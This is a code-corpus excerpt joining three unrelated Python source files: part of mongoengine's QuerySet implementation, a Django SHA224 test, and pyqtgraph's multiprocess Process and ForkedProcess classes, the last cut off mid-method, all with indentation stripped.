"""Limit the number of returned documents to `n`. This may also be
achieved using array-slicing syntax (e.g. ``User.objects[:5]``).
:param n: the maximum number of objects to return
"""
if n == 0:
self._cursor.limit(1)
else:
self._cursor.limit(n)
self._limit = n
# Return self to allow chaining
return self
def skip(self, n):
"""Skip `n` documents before returning the results. This may also be
achieved using array-slicing syntax (e.g. ``User.objects[5:]``).
:param n: the number of objects to skip before returning results
"""
self._cursor.skip(n)
self._skip = n
return self
def hint(self, index=None):
"""Added 'hint' support, telling Mongo the proper index to use for the
query.
Judicious use of hints can greatly improve query performance. When doing
a query on multiple fields (at least one of which is indexed) pass the
indexed field as a hint to the query.
Hinting will not do anything if the corresponding index does not exist.
The last hint applied to this cursor takes precedence over all others.
.. versionadded:: 0.5
"""
self._cursor.hint(index)
self._hint = index
return self
def __getitem__(self, key):
"""Support skip and limit using getitem and slicing syntax.
"""
# Slice provided
if isinstance(key, slice):
try:
self._cursor_obj = self._cursor[key]
self._skip, self._limit = key.start, key.stop
except IndexError, err:
# PyMongo raises an error if key.start == key.stop, catch it,
# bin it, kill it.
start = key.start or 0
if start >= 0 and key.stop >= 0 and key.step is None:
if start == key.stop:
self.limit(0)
self._skip, self._limit = key.start, key.stop - start
return self
raise err
# Allow further QuerySet modifications to be performed
return self
# Integer index provided
elif isinstance(key, int):
if self._scalar:
return self._get_scalar(self._document._from_son(
self._cursor[key]))
return self._document._from_son(self._cursor[key])
raise AttributeError
def distinct(self, field):
"""Return a list of distinct values for a given field.
:param field: the field to select distinct values from
.. versionadded:: 0.4
.. versionchanged:: 0.5 - Fixed handling references
"""
from dereference import DeReference
return DeReference()(self._cursor.distinct(field), 1)
def only(self, *fields):
"""Load only a subset of this document's fields. ::
post = BlogPost.objects(...).only("title", "author.name")
:param fields: fields to include
.. versionadded:: 0.3
.. versionchanged:: 0.5 - Added subfield support
"""
fields = dict([(f, QueryFieldList.ONLY) for f in fields])
return self.fields(**fields)
def exclude(self, *fields):
"""Opposite to .only(), exclude some document's fields. ::
post = BlogPost.objects(...).exclude("comments")
:param fields: fields to exclude
.. versionadded:: 0.5
"""
fields = dict([(f, QueryFieldList.EXCLUDE) for f in fields])
return self.fields(**fields)
def fields(self, **kwargs):
"""Manipulate how you load this document's fields. Used by `.only()`
and `.exclude()` to manipulate which fields to retrieve. Fields also
allows for a greater level of control for example:
Retrieving a Subrange of Array Elements:
You can use the $slice operator to retrieve a subrange of elements in
an array ::
post = BlogPost.objects(...).fields(slice__comments=5) // first 5 comments
:param kwargs: A dictionary identifying what to include
.. versionadded:: 0.5
"""
# Check for an operator and transform to mongo-style if there is
operators = ["slice"]
cleaned_fields = []
for key, value in kwargs.items():
parts = key.split('__')
op = None
if parts[0] in operators:
op = parts.pop(0)
value = {'$' + op: value}
key = '.'.join(parts)
cleaned_fields.append((key, value))
fields = sorted(cleaned_fields, key=operator.itemgetter(1))
for value, group in itertools.groupby(fields, lambda x: x[1]):
fields = [field for field, value in group]
fields = self._fields_to_dbfields(fields)
self._loaded_fields += QueryFieldList(fields, value=value)
return self
def all_fields(self):
"""Include all fields. Reset all previously calls of .only() and .exclude(). ::
post = BlogPost.objects(...).exclude("comments").only("title").all_fields()
.. versionadded:: 0.5
"""
self._loaded_fields = QueryFieldList(always_include=self._loaded_fields.always_include)
return self
def _fields_to_dbfields(self, fields):
"""Translate fields paths to its db equivalents"""
ret = []
for field in fields:
field = ".".join(f.db_field for f in QuerySet._lookup_field(self._document, field.split('.')))
ret.append(field)
return ret
def order_by(self, *keys):
"""Order the :class:`~mongoengine.queryset.QuerySet` by the keys. The
order may be specified by prepending each of the keys by a + or a -.
Ascending order is assumed.
:param keys: fields to order the query results by; keys may be
prefixed with **+** or **-** to determine the ordering direction
"""
key_list = []
for key in keys:
if not key: continue
direction = pymongo.ASCENDING
if key[0] == '-':
direction = pymongo.DESCENDING
if key[0] in ('-', '+'):
key = key[1:]
key = key.replace('__', '.')
try:
key = QuerySet._translate_field_name(self._document, key)
except:
pass
key_list.append((key, direction))
self._ordering = key_list
self._cursor.sort(key_list)
return self
def explain(self, format=False):
"""Return an explain plan record for the
:class:`~mongoengine.queryset.QuerySet`\ 's cursor.
:param format: format the plan before returning it
"""
plan = self._cursor.explain()
if format:
plan = pprint.pformat(plan)
return plan
def snapshot(self, enabled):
"""Enable or disable snapshot mode when querying.
:param enabled: whether or not snapshot mode is enabled
..versionchanged:: 0.5 - made chainable
"""
self._snapshot = enabled
return self
def timeout(self, enabled):
"""Enable or disable the default mongod timeout when querying.
:param enabled: whether or not the timeout is used
..versionchanged:: 0.5 - made chainable
"""
self._timeout = enabled
return self
def slave_okay(self, enabled):
"""Enable or disable the slave_okay when querying.
:param enabled: whether or not the slave_okay is enabled
"""
self._slave_okay = enabled
return self
def read_preference(self, read_preference):
"""Specify the read preference when querying.
:param read_preference: the ReadPreference to use
"""
self._read_preference = read_preference
return self
def delete(self, safe=False):
"""Delete the documents matched by the query.
:param safe: check if the operation succeeded before returning
"""
doc = self._document
# Check for DENY rules before actually deleting/nullifying any other
# references
for rule_entry in doc._meta['delete_rules']:
document_cls, field_name = rule_entry
rule = doc._meta['delete_rules'][rule_entry]
if rule == DENY and document_cls.objects(**{field_name + '__in': self}).count() > 0:
msg = u'Could not delete document (at least %s.%s refers to it)' % \
(document_cls.__name__, field_name)
raise OperationError(msg)
for rule_entry in doc._meta['delete_rules']:
document_cls, field_name = rule_entry
rule = doc._meta['delete_rules'][rule_entry]
if rule == CASCADE:
document_cls.objects(**{field_name + '__in': self}).delete(safe=safe)
elif rule == NULLIFY:
document_cls.objects(**{field_name + '__in': self}).update(
safe_update=safe,
**{'unset__%s' % field_name: 1})
self._collection.remove(self._query, safe=safe)
@classmethod
def _transform_update(cls, _doc_cls=None, **update):
"""Transform an update spec from Django-style format to Mongo format.
"""
operators = ['set', 'unset', 'inc', 'dec', 'pop', 'push', 'push_all',
'pull', 'pull_all', 'add_to_set']
mongo_update = {}
for key, value in update.items():
if key == "__raw__":
mongo_update.update(value)
continue
parts = key.split('__')
# Check for an operator and transform to mongo-style if there is
op = None
if parts[0] in operators:
op = parts.pop(0)
# Convert Pythonic names to Mongo equivalents
if op in ('push_all', 'pull_all'):
op = op.replace('_all', 'All')
elif op == 'dec':
# Support decrement by flipping a positive value's sign
# and using 'inc'
op = 'inc'
if value > 0:
value = -value
elif op == 'add_to_set':
op = op.replace('_to_set', 'ToSet')
if _doc_cls:
# Switch field names to proper names [set in Field(name='foo')]
fields = QuerySet._lookup_field(_doc_cls, parts)
parts = []
cleaned_fields = []
for field in fields:
append_field = True
if isinstance(field, str):
# Convert the S operator to $
if field == 'S':
field = '$'
parts.append(field)
append_field = False
else:
parts.append(field.db_field)
if append_field:
cleaned_fields.append(field)
# Convert value to proper value
field = cleaned_fields[-1]
if op in (None, 'set', 'push', 'pull', 'addToSet'):
if field.required or value is not None:
value = field.prepare_query_value(op, value)
elif op in ('pushAll', 'pullAll'):
value = [field.prepare_query_value(op, v) for v in value]
key = '.'.join(parts)
if not op:
raise InvalidQueryError("Updates must supply an operation eg: set__FIELD=value")
if op:
value = {key: value}
key = '$' + op
if key not in mongo_update:
mongo_update[key] = value
elif key in mongo_update and isinstance(mongo_update[key], dict):
mongo_update[key].update(value)
return mongo_update
def update(self, safe_update=True, upsert=False, multi=True, write_options=None, **update):
"""Perform an atomic update on the fields matched by the query. When
``safe_update`` is used, the number of affected documents is returned.
:param safe_update: check if the operation succeeded before returning
:param upsert: Any existing document with that "_id" is overwritten.
:param write_options: extra keyword arguments for :meth:`~pymongo.collection.Collection.update`
.. versionadded:: 0.2
"""
if not update:
raise OperationError("No update parameters, would remove data")
if not write_options:
write_options = {}
update = QuerySet._transform_update(self._document, **update)
query = self._query
try:
ret = self._collection.update(query, update, multi=multi,
upsert=upsert, safe=safe_update,
**write_options)
if ret is not None and 'n' in ret:
return ret['n']
except pymongo.errors.OperationFailure, err:
if unicode(err) == u'multi not coded yet':
message = u'update() method requires MongoDB 1.1.3+'
raise OperationError(message)
raise OperationError(u'Update failed (%s)' % unicode(err))
def update_one(self, safe_update=True, upsert=False, write_options=None, **update):
"""Perform an atomic update on first field matched by the query. When
``safe_update`` is used, the number of affected documents is returned.
:param safe_update: check if the operation succeeded before returning
:param upsert: Any existing document with that "_id" is overwritten.
:param write_options: extra keyword arguments for :meth:`~pymongo.collection.Collection.update`
:param update: Django-style update keyword arguments
.. versionadded:: 0.2
"""
if not update:
raise OperationError("No update parameters, would remove data")
if not write_options:
write_options = {}
update = QuerySet._transform_update(self._document, **update)
query = self._query
try:
# Explicitly provide 'multi=False' to newer versions of PyMongo
# as the default may change to 'True'
ret = self._collection.update(query, update, multi=False,
upsert=upsert, safe=safe_update,
**write_options)
if ret is not None and 'n' in ret:
return ret['n']
except pymongo.errors.OperationFailure, e:
raise OperationError(u'Update failed [%s]' % unicode(e))
def __iter__(self):
self.rewind()
return self
def _get_scalar(self, doc):
def lookup(obj, name):
chunks = name.split('__')
for chunk in chunks:
if hasattr(obj, '_db_field_map'):
chunk = obj._db_field_map.get(chunk, chunk)
obj = getattr(obj, chunk)
return obj
data = [lookup(doc, n) for n in self._scalar]
if len(data) == 1:
return data[0]
return tuple(data)
def scalar(self, *fields):
"""Instead of returning Document instances, return either a specific
value or a tuple of values in order.
This effects all results and can be unset by calling ``scalar``
without arguments. Calls ``only`` automatically.
:param fields: One or more fields to return instead of a Document.
"""
self._scalar = list(fields)
if fields:
self.only(*fields)
else:
self.all_fields()
return self
def values_list(self, *fields):
"""An alias for scalar"""
return self.scalar(*fields)
def _sub_js_fields(self, code):
"""When fields are specified with [~fieldname] syntax, where
*fieldname* is the Python name of a field, *fieldname* will be
substituted for the MongoDB name of the field (specified using the
:attr:`name` keyword argument in a field's constructor).
"""
def field_sub(match):
# Extract just the field name, and look up the field objects
field_name = match.group(1).split('.')
fields = QuerySet._lookup_field(self._document, field_name)
# Substitute the correct name for the field into the javascript
return u'["%s"]' % fields[-1].db_field
def field_path_sub(match):
# Extract just the field name, and look up the field objects
field_name = match.group(1).split('.')
fields = QuerySet._lookup_field(self._document, field_name)
# Substitute the correct name for the field into the javascript
return ".".join([f.db_field for f in fields])
code = re.sub(u'\[\s*~([A-z_][A-z_0-9.]+?)\s*\]', field_sub, code)
code = re.sub(u'\{\{\s*~([A-z_][A-z_0-9.]+?)\s*\}\}', field_path_sub, code)
return code
def exec_js(self, code, *fields, **options):
"""Execute a Javascript function on the server. A list of fields may be
provided, which will be translated to their correct names and supplied
as the arguments to the function. A few extra variables are added to
the function's scope: ``collection``, which is the name of the
collection in use; ``query``, which is an object representing the
current query; and ``options``, which is an object containing any
options specified as keyword arguments.
As fields in MongoEngine may use different names in the database (set
using the :attr:`db_field` keyword argument to a :class:`Field`
constructor), a mechanism exists for replacing MongoEngine field names
with the database field names in Javascript code. When accessing a
field, use square-bracket notation, and prefix the MongoEngine field
name with a tilde (~).
:param code: a string of Javascript code to execute
:param fields: fields that you will be using in your function, which
will be passed in to your function as arguments
:param options: options that you want available to the function
(accessed in Javascript through the ``options`` object)
"""
code = self._sub_js_fields(code)
fields = [QuerySet._translate_field_name(self._document, f)
for f in fields]
collection = self._document._get_collection_name()
scope = {
'collection': collection,
'options': options or {},
}
query = self._query
if self._where_clause:
query['$where'] = self._where_clause
scope['query'] = query
code = Code(code, scope=scope)
db = self._document._get_db()
return db.eval(code, *fields)
def where(self, where_clause):
"""Filter ``QuerySet`` results with a ``$where`` clause (a Javascript
expression). Performs automatic field name substitution like
:meth:`mongoengine.queryset.Queryset.exec_js`.
.. note:: When using this mode of query, the database will call your
function, or evaluate your predicate clause, for each object
in the collection.
.. versionadded:: 0.5
"""
where_clause = self._sub_js_fields(where_clause)
self._where_clause = where_clause
return self
def sum(self, field):
"""Sum over the values of the specified field.
:param field: the field to sum over; use dot-notation to refer to
embedded document fields
.. versionchanged:: 0.5 - updated to map_reduce as db.eval doesnt work
with sharding.
"""
map_func = Code("""
function() {
emit(1, this[field] || 0);
}
""", scope={'field': field})
reduce_func = Code("""
function(key, values) {
var sum = 0;
for (var i in values) {
sum += values[i];
}
return sum;
}
""")
for result in self.map_reduce(map_func, reduce_func, output='inline'):
return result.value
else:
return 0
def average(self, field):
"""Average over the values of the specified field.
:param field: the field to average over; use dot-notation to refer to
embedded document fields
.. versionchanged:: 0.5 - updated to map_reduce as db.eval doesnt work
with sharding.
"""
map_func = Code("""
function() {
if (this.hasOwnProperty(field))
emit(1, {t: this[field] || 0, c: 1});
}
""", scope={'field': field})
reduce_func = Code("""
function(key, values) {
var out = {t: 0, c: 0};
for (var i in values) {
var value = values[i];
out.t += value.t;
out.c += value.c;
}
return out;
}
""")
finalize_func = Code("""
function(key, value) {
return value.t / value.c;
}
""")
for result in self.map_reduce(map_func, reduce_func, finalize_f=finalize_func, output='inline'):
return result.value
else:
return 0
def item_frequencies(self, field, normalize=False, map_reduce=True):
"""Returns a dictionary of all items present in a field across
the whole queried set of documents, and their corresponding frequency.
This is useful for generating tag clouds, or searching documents.
.. note::
Can only do direct simple mappings and cannot map across
:class:`~mongoengine.ReferenceField` or
:class:`~mongoengine.GenericReferenceField` for more complex
counting a manual map reduce call would is required.
If the field is a :class:`~mongoengine.ListField`, the items within
each list will be counted individually.
:param field: the field to use
:param normalize: normalize the results so they add to 1.0
:param map_reduce: Use map_reduce over exec_js
.. versionchanged:: 0.5 defaults to map_reduce and can handle embedded
document lookups
"""
if map_reduce:
return self._item_frequencies_map_reduce(field, normalize=normalize)
return self._item_frequencies_exec_js(field, normalize=normalize)
def _item_frequencies_map_reduce(self, field, normalize=False):
map_func = """
function() {
path = '{{~%(field)s}}'.split('.');
field = this;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
field.forEach(function(item) {
emit(item, 1);
});
} else if (field) {
emit(field, 1);
} else {
emit(null, 1);
}
}
""" % dict(field=field)
reduce_func = """
function(key, values) {
var total = 0;
var valuesSize = values.length;
for (var i=0; i < valuesSize; i++) {
total += parseInt(values[i], 10);
}
return total;
}
"""
values = self.map_reduce(map_func, reduce_func, 'inline')
frequencies = {}
for f in values:
key = f.key
if isinstance(key, float):
if int(key) == key:
key = int(key)
key = str(key)
frequencies[key] = f.value
if normalize:
count = sum(frequencies.values())
frequencies = dict([(k, v / count) for k, v in frequencies.items()])
return frequencies
def _item_frequencies_exec_js(self, field, normalize=False):
"""Uses exec_js to execute"""
freq_func = """
function(path) {
path = path.split('.');
if (options.normalize) {
var total = 0.0;
db[collection].find(query).forEach(function(doc) {
field = doc;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
total += field.length;
} else {
total++;
}
});
}
var frequencies = {};
var inc = 1.0;
if (options.normalize) {
inc /= total;
}
db[collection].find(query).forEach(function(doc) {
field = doc;
for (p in path) {
if (field)
field = field[path[p]];
else
break;
}
if (field && field.constructor == Array) {
field.forEach(function(item) {
frequencies[item] = inc + (isNaN(frequencies[item]) ? 0: frequencies[item]);
});
} else {
var item = field;
frequencies[item] = inc + (isNaN(frequencies[item]) ? 0: frequencies[item]);
}
});
return frequencies;
}
"""
data = self.exec_js(freq_func, field, normalize=normalize)
if 'undefined' in data:
data[None] = data['undefined']
del(data['undefined'])
return data
def __repr__(self):
limit = REPR_OUTPUT_SIZE + 1
start = (0 if self._skip is None else self._skip)
if self._limit is None:
stop = start + limit
if self._limit is not None:
if self._limit - start > limit:
stop = start + limit
else:
stop = self._limit
try:
data = list(self[start:stop])
except pymongo.errors.InvalidOperation:
return ".. queryset mid-iteration .."
if len(data) > REPR_OUTPUT_SIZE:
data[-1] = "...(remaining elements truncated)..."
return repr(data)
def select_related(self, max_depth=1):
"""Handles dereferencing of :class:`~bson.dbref.DBRef` objects to
a maximum depth in order to cut down the number queries to mongodb.
.. versionadded:: 0.5
"""
from dereference import DeReference
# Make select related work the same for querysets
max_depth += 1
return DeReference()(self, max_depth=max_depth)
class QuerySetManager(object):
get_queryset = None
def __init__(self, queryset_func=None):
if queryset_func:
self.get_queryset = queryset_func
self._collections = {}
def __get__(self, instance, owner):
"""Descriptor for instantiating a new QuerySet object when
Document.objects is accessed.
"""
if instance is not None:
# Document class being used rather than a document object
return self
# owner is the document that contains the QuerySetManager
queryset_class = owner._meta['queryset_class'] or QuerySet
queryset = queryset_class(owner, owner._get_collection())
if self.get_queryset:
if self.get_queryset.func_code.co_argcount == 1:
queryset = self.get_queryset(queryset)
else:
queryset = self.get_queryset(owner, queryset)
return queryset
def queryset_manager(func):
"""Decorator that allows you to define custom QuerySet managers on
:class:`~mongoengine.Document` classes. The manager must be a function that
accepts a :class:`~mongoengine.Document` class as its first argument, and a
:class:`~mongoengine.queryset.QuerySet` as its second argument. The method
function should return a :class:`~mongoengine.queryset.QuerySet`, probably
the same one that was passed in, but modified in some way.
"""
if func.func_code.co_argcount == 1:
import warnings
msg = 'Methods decorated with queryset_manager should take 2 arguments'
warnings.warn(msg, DeprecationWarning)
return QuerySetManager(func)
|
wkschwartz/django
|
refs/heads/stable/3.2.x
|
tests/db_functions/text/test_sha224.py
|
17
|
import unittest
from django.db import NotSupportedError, connection
from django.db.models import CharField
from django.db.models.functions import SHA224
from django.test import TestCase
from django.test.utils import register_lookup
from ..models import Author
class SHA224Tests(TestCase):
@classmethod
def setUpTestData(cls):
Author.objects.bulk_create([
Author(alias='John Smith'),
Author(alias='Jordan Élena'),
Author(alias='皇帝'),
Author(alias=''),
Author(alias=None),
])
def test_basic(self):
authors = Author.objects.annotate(
sha224_alias=SHA224('alias'),
).values_list('sha224_alias', flat=True).order_by('pk')
self.assertSequenceEqual(
authors,
[
'a61303c220731168452cb6acf3759438b1523e768f464e3704e12f70',
'2297904883e78183cb118fc3dc21a610d60daada7b6ebdbc85139f4d',
'eba942746e5855121d9d8f79e27dfdebed81adc85b6bf41591203080',
'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f',
'd14a028c2a3a2bc9476102bb288234c415a2b01f828ea62ac5b3e42f'
if connection.features.interprets_empty_strings_as_nulls else None,
],
)
def test_transform(self):
with register_lookup(CharField, SHA224):
authors = Author.objects.filter(
alias__sha224='a61303c220731168452cb6acf3759438b1523e768f464e3704e12f70',
).values_list('alias', flat=True)
self.assertSequenceEqual(authors, ['John Smith'])
@unittest.skipUnless(connection.vendor == 'oracle', "Oracle doesn't support SHA224.")
def test_unsupported(self):
msg = 'SHA224 is not supported on Oracle.'
with self.assertRaisesMessage(NotSupportedError, msg):
Author.objects.annotate(sha224_alias=SHA224('alias')).first()
|
campagnola/acq4
|
refs/heads/develop
|
acq4/pyqtgraph/multiprocess/processes.py
|
3
|
import subprocess, atexit, os, sys, time, random, socket, signal, inspect
import multiprocessing.connection
try:
import cPickle as pickle
except ImportError:
import pickle
from .remoteproxy import RemoteEventHandler, ClosedError, NoResultError, LocalObjectProxy, ObjectProxy
from ..Qt import QT_LIB
from ..util import cprint # color printing for debugging
__all__ = ['Process', 'QtProcess', 'ForkedProcess', 'ClosedError', 'NoResultError']
class Process(RemoteEventHandler):
"""
Bases: RemoteEventHandler
This class is used to spawn and control a new python interpreter.
It uses subprocess.Popen to start the new process and communicates with it
using multiprocessing.Connection objects over a network socket.
By default, the remote process will immediately enter an event-processing
loop that carries out requests send from the parent process.
Remote control works mainly through proxy objects::
proc = Process() ## starts process, returns handle
rsys = proc._import('sys') ## asks remote process to import 'sys', returns
## a proxy which references the imported module
rsys.stdout.write('hello\n') ## This message will be printed from the remote
## process. Proxy objects can usually be used
## exactly as regular objects are.
proc.close() ## Request the remote process shut down
Requests made via proxy objects may be synchronous or asynchronous and may
return objects either by proxy or by value (if they are picklable). See
ProxyObject for more information.
"""
_process_count = 1 # just used for assigning colors to each process for debugging
def __init__(self, name=None, target=None, executable=None, copySysPath=True, debug=False, timeout=20, wrapStdout=None, pyqtapis=None):
"""
============== =============================================================
**Arguments:**
name Optional name for this process used when printing messages
from the remote process.
target Optional function to call after starting remote process.
By default, this is startEventLoop(), which causes the remote
process to handle requests from the parent process until it
is asked to quit. If you wish to specify a different target,
it must be picklable (bound methods are not).
copySysPath If True, copy the contents of sys.path to the remote process.
If False, then only the path required to import pyqtgraph is
added.
debug If True, print detailed information about communication
with the child process.
wrapStdout If True (default on windows) then stdout and stderr from the
child process will be caught by the parent process and
forwarded to its stdout/stderr. This provides a workaround
for a python bug: http://bugs.python.org/issue3905
but has the side effect that child output is significantly
delayed relative to the parent output.
pyqtapis Optional dictionary of PyQt API version numbers to set before
importing pyqtgraph in the remote process.
============== =============================================================
"""
if target is None:
target = startEventLoop
if name is None:
name = str(self)
if executable is None:
executable = sys.executable
self.debug = 7 if debug is True else False # 7 causes printing in white
## random authentication key
authkey = os.urandom(20)
## Windows seems to have a hard time with hmac
if sys.platform.startswith('win'):
authkey = None
#print "key:", ' '.join([str(ord(x)) for x in authkey])
## Listen for connection from remote process (and find free port number)
l = multiprocessing.connection.Listener(('localhost', 0), authkey=authkey)
port = l.address[1]
## start remote process, instruct it to run target function
if copySysPath:
sysPath = sys.path
else:
# what path do we need to make target importable?
mod = inspect.getmodule(target)
modroot = sys.modules[mod.__name__.split('.')[0]]
sysPath = os.path.abspath(os.path.join(os.path.dirname(modroot.__file__), '..'))
bootstrap = os.path.abspath(os.path.join(os.path.dirname(__file__), 'bootstrap.py'))
self.debugMsg('Starting child process (%s %s)' % (executable, bootstrap))
# Decide on printing color for this process
if debug:
procDebug = (Process._process_count%6) + 1 # pick a color for this process to print in
Process._process_count += 1
else:
procDebug = False
if wrapStdout is None:
wrapStdout = sys.platform.startswith('win')
if wrapStdout:
## note: we need all three streams to have their own PIPE due to this bug:
## http://bugs.python.org/issue3905
stdout = subprocess.PIPE
stderr = subprocess.PIPE
self.proc = subprocess.Popen((executable, bootstrap), stdin=subprocess.PIPE, stdout=stdout, stderr=stderr)
## to circumvent the bug and still make the output visible, we use
## background threads to pass data from pipes to stdout/stderr
self._stdoutForwarder = FileForwarder(self.proc.stdout, "stdout", procDebug)
self._stderrForwarder = FileForwarder(self.proc.stderr, "stderr", procDebug)
else:
self.proc = subprocess.Popen((executable, bootstrap), stdin=subprocess.PIPE)
targetStr = pickle.dumps(target) ## double-pickle target so that child has a chance to
## set its sys.path properly before unpickling the target
pid = os.getpid() # we must send pid to child because windows does not have getppid
## Send everything the remote process needs to start correctly
data = dict(
name=name+'_child',
port=port,
authkey=authkey,
ppid=pid,
targetStr=targetStr,
path=sysPath,
qt_lib=QT_LIB,
debug=procDebug,
pyqtapis=pyqtapis,
)
pickle.dump(data, self.proc.stdin)
self.proc.stdin.close()
## open connection for remote process
self.debugMsg('Listening for child process on port %d, authkey=%s..' % (port, repr(authkey)))
while True:
try:
conn = l.accept()
break
except IOError as err:
if err.errno == 4: # interrupted; try again
continue
else:
raise
RemoteEventHandler.__init__(self, conn, name+'_parent', pid=self.proc.pid, debug=self.debug)
self.debugMsg('Connected to child process.')
atexit.register(self.join)
def join(self, timeout=10):
self.debugMsg('Joining child process..')
if self.proc.poll() is None:
self.close()
start = time.time()
while self.proc.poll() is None:
if timeout is not None and time.time() - start > timeout:
raise Exception('Timed out waiting for remote process to end.')
time.sleep(0.05)
self.conn.close()
self.debugMsg('Child process exited. (%d)' % self.proc.returncode)
def debugMsg(self, msg, *args):
if hasattr(self, '_stdoutForwarder'):
## Lock output from subprocess to make sure we do not get line collisions
with self._stdoutForwarder.lock:
with self._stderrForwarder.lock:
RemoteEventHandler.debugMsg(self, msg, *args)
else:
RemoteEventHandler.debugMsg(self, msg, *args)
def startEventLoop(name, port, authkey, ppid, debug=False):
if debug:
import os
cprint.cout(debug, '[%d] connecting to server at port localhost:%d, authkey=%s..\n'
% (os.getpid(), port, repr(authkey)), -1)
conn = multiprocessing.connection.Client(('localhost', int(port)), authkey=authkey)
if debug:
cprint.cout(debug, '[%d] connected; starting remote proxy.\n' % os.getpid(), -1)
global HANDLER
#ppid = 0 if not hasattr(os, 'getppid') else os.getppid()
HANDLER = RemoteEventHandler(conn, name, ppid, debug=debug)
while True:
try:
HANDLER.processRequests() # exception raised when the loop should exit
time.sleep(0.01)
except ClosedError:
HANDLER.debugMsg('Exiting server loop.')
sys.exit(0)
class ForkedProcess(RemoteEventHandler):
"""
ForkedProcess is a substitute for Process that uses os.fork() to generate a new process.
This is much faster than starting a completely new interpreter and child processes
automatically have a copy of the entire program state from before the fork. This
makes it an appealing approach when parallelizing expensive computations. (see
also Parallelizer)
However, fork() comes with some caveats and limitations:
- fork() is not available on Windows.
- It is not possible to have a QApplication in both parent and child process
(unless both QApplications are created _after_ the call to fork())
Attempts by the forked process to access Qt GUI elements created by the parent
will most likely cause the child to crash.
- Likewise, database connections are unlikely to function correctly in a forked child.
- Threads are not copied by fork(); the new process
will have only one thread that starts wherever fork() was called in the parent process.
- Forked processes are unceremoniously terminated when join() is called; they are not
given any opportunity to clean up. (This prevents them calling any cleanup code that
was only intended to be used by the parent process)
- Normally when fork()ing, open file handles are shared with the parent process,
which is potentially dangerous. ForkedProcess is careful to close all file handles
that are not explicitly needed--stdout, stderr, and a single pipe to the parent
process.
"""
def __init__(self, name=None, target=0, preProxy=None, randomReseed=True):
"""
When initializing, an optional target may be given.
If no target is specified, self.eventLoop will be used.
If None is given, no target will be called (and it will be up
to the caller to properly shut down the forked process)
preProxy may be a dict of values that will appear as ObjectProxy
in the remote process (but do not need to be sent explicitly since
they are available immediately before the call to fork().
Proxies will be availabe as self.proxies[name].
If randomReseed is True, the built-in random and numpy.random generators
will be reseeded in the child process.
"""
self.hasJoined = False
if target == 0:
target = self.eventLoop
if name is None:
name = str(self)
conn, remoteConn = multiprocessing.Pipe()
proxyIDs = {}
if preProxy is not None:
for k, v in preProxy.items():
proxyId = LocalObjectProxy.registerObject(v)
proxyIDs[k] = proxyId
ppid = os.getpid() # write this down now; windows doesn't have getppid
pid = os.fork()
if pid == 0:
self.isParent = False
## We are now in the forked process; need to be extra careful what we touch while here.
## - no reading/writing file handles/sockets owned by parent process (stdout is ok)
## - don't touch QtGui or QApplication at all; these are landmines.
## - don't let the process call exit handlers
os.setpgrp() ## prevents signals (notably keyboard interrupt) being forwarded from parent to this process
## close all file handles we do not want shared with parent
conn.close()
sys.stdin.close() ## otherwise we screw with interactive prompts.
fid = remoteConn.fileno()
os.closerange(3, fid)
os.closerange(fid+1, 4096) ## just guessing on the maximum descriptor count..
## Override any custom exception hooks
def excepthook(*args):
import traceback
traceback.print_exception(*args)
sys.excepthook = excepthook
## Make it harder to access QApplication instance
for qtlib in ('PyQt4', 'PySide', 'PyQt5'):
if qtlib in sys.modules:
sys.modules[qtlib+'.QtGui'].QApplication = None
sys.modules.pop(qtlib+'.QtGui', None)
sys.modules.pop(qtlib+'.QtCore', None)
## sabotage atexit callbacks
atexit._exithandlers = []
atexit.register(lambda: os._exit(0))
if randomReseed:
if 'numpy.random' in sys.modules:
sys.modules['numpy.random'].seed(os.getpid() ^ int(time.time()*10000%10000))
if 'random' in sys.modules:
sys.modules['random'].seed(os.getpid() ^ int(time.time()*10000%10000))
#ppid = 0 if not hasattr(os, 'getppid') else os.getppid()
RemoteEventHandler.__init__(self, remoteConn, name+'_child', pid=ppid)
self.forkedProxies = {}
for name, proxyId in proxyIDs.items():
self.forkedProxies[name] = ObjectProxy(ppid, proxyId=proxyId, typeStr=repr(preProxy[name]))
if target is not None:
target()
else:
self.isParent = True
self.childPid = pid
remoteConn.close()
RemoteEventHandler.handlers = {} ## don't want to inherit any of this from the parent.
RemoteEventHandler.__init__(self, conn, name+'_parent', pid=pid)
atexit.register(self.join)
def eventLoop(self):
while True:
try:
self.processRequests() # exception raised when the loop should exit
time.sleep(0.01)
except ClosedError:
break
except:
print("Error occurred in forked event loop:")
sys.excepthook(*sys.exc_info())
sys.exit(0)
def join(self, timeout=10):
if self.hasJoined:
return
#os.kill(pid, 9)
try:
self.close(callSync='sync', timeout=timeout, noCleanup=True) ## ask the child process to exit and require that it return a confirmation.
except IOError: ## probably remote process has already quit
pass
try:
os.waitpid(self.childPid, 0)
except OSError: ## probably remote process has already quit
pass
self.conn.close() # don't leak file handles!
self.hasJoined = True
def kill(self):
"""Immediately kill the forked remote process.
This is generally safe because forked processes are already
expected to _avoid_ any cleanup at exit."""
os.kill(self.childPid, signal.SIGKILL)
self.hasJoined = True
##Special set of subclasses that implement a Qt event loop instead.
class RemoteQtEventHandler(RemoteEventHandler):
def __init__(self, *args, **kwds):
RemoteEventHandler.__init__(self, *args, **kwds)
def startEventTimer(self):
from ..Qt import QtGui, QtCore
self.timer = QtCore.QTimer()
self.timer.timeout.connect(self.processRequests)
self.timer.start(10)
def processRequests(self):
try:
RemoteEventHandler.processRequests(self)
except ClosedError:
from ..Qt import QtGui, QtCore
QtGui.QApplication.instance().quit()
self.timer.stop()
#raise SystemExit
class QtProcess(Process):
"""
QtProcess is essentially the same as Process, with two major differences:
- The remote process starts by running startQtEventLoop() which creates a
QApplication in the remote process and uses a QTimer to trigger
remote event processing. This allows the remote process to have its own
GUI.
- A QTimer is also started on the parent process which polls for requests
from the child process. This allows Qt signals emitted within the child
process to invoke slots on the parent process and vice-versa. This can
be disabled using processRequests=False in the constructor.
Example::
proc = QtProcess()
rQtGui = proc._import('PyQt4.QtGui')
btn = rQtGui.QPushButton('button on child process')
btn.show()
def slot():
print('slot invoked on parent process')
btn.clicked.connect(proxy(slot)) # be sure to send a proxy of the slot
"""
def __init__(self, **kwds):
if 'target' not in kwds:
kwds['target'] = startQtEventLoop
from ..Qt import QtGui ## avoid module-level import to keep bootstrap snappy.
self._processRequests = kwds.pop('processRequests', True)
if self._processRequests and QtGui.QApplication.instance() is None:
